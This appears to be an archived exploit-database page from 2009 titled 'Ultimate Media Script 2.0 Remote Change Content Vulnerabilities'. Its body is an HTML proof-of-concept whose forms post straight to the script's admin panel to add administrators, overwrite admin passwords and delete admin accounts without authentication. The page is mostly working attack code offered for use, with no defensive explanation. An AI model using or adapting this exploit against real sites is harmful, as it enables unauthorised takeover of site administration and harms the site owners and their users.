[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ultimate Media Script 2.0 Remote Change Content Vulnerabilities
# Published : 2009-05-26
# Author : ThE g0bL!N
# Previous Title : eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulns
# Next Title : Gallarific (user.php) Arbirary Change Admin Information Exploit


<tittle> Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit</tittle>
 <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
       <TD class=column1><INPUT class=ums_input name=username></TD>
       <TD class=column1><INPUT class=ums_input name=pass></TD>
       <TD class=column1 align=middle><INPUT type=image border=0 src="img/save.gif"></TD>
       <INPUT type=hidden value=add name=button>
      </FORM>
    </TR>
 
        <TR>
          <TD class=cat><b>Admin name:</b></TD>
          <TD class=cat><b>Password:</b></TD>
          <TD class=cat><b>Delete:</b></TD></TR>
 
        <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
 
        <TR>
          <TD class=column2 width="33%"><INPUT class=ums_input value="admin" name=username_edit[1]></TD>
          <TD class=column2 width="33%"><INPUT class=ums_input type=password value="admin" name=pass_edit[1]></TD>
          <TD class=column2><A href="http://umscript.com/demo/admin/index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img/delete.gif"></A></TD>
        </TR>
 
        <INPUT type=hidden value=modify name=do>
        <TR>
           </SPAN>
           <INPUT type=image border=0 src="img/save_all.gif">

# www.Syue.com [2009-05-26]